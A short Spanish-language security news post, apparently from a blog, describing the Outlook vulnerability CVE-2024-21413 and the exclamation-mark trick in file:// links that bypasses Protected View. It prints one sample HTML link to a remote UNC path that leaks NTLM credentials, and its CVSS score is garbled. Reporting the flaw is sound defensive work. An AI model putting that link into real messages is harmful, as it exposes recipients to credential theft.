Se ha descubierto una vulnerabilidad crítica CVE-2024-21413 en Microsoft Outlook, que permite a los atacantes ejecutar código arbitrario en sistemas remotos. CISA advierte sobre la necesidad urgente de corregir la vulnerabilidad, especialmente para las agencias federales.

⌛ La vulnerabilidad está relacionada con una validación de entrada incorrecta al abrir correos electrónicos con enlaces maliciosos, lo que permite eludir el modo Vista protegida. Los atacantes utilizan el símbolo de exclamación en los enlaces para eludir los mecanismos de seguridad de Outlook.

💡Microsoft ha corregido CVE-2024-21413 (CVSS: en 2024), pero advirtió que la vulnerabilidad sigue activa incluso en modo de vista previa.


Check Point dice que los intrusos utilizan el método de bypass añadiendo a los enlaces de protocolo:

file://
Hack

Un signo de exclamación y texto aleatorio después de expandir el archivo. Este enfoque le permite eludir los mecanismos de protección de Outlook y descargar contenido malicioso.


🚷 Ejemplo:

<a href="file://\\10.10.111.111\test\test.rtf!something "> CLICK ME </ a >
HTML

Hay varias versiones de productos de Microsoft en juego:

  • Microsoft Office LTSC 2021.
  • Microsoft 365 Apps for Enterprise.
  • Microsoft Outlook 2016.
  • Microsoft Office 2019.

💡 La explotación exitosa de la vulnerabilidad puede conducir al robo de datos de contabilidad NTLM y a la ejecución de ataques arbitrarios.

S.I Stega Intelligence


Discover more from Stega Intelligence

Subscribe to get the latest posts sent to your email.

By Tony M.

Founder and Developer at Stega Intelligence

Leave a Reply

Discover more from Stega Intelligence

Subscribe now to keep reading and get access to the full archive.

Continue reading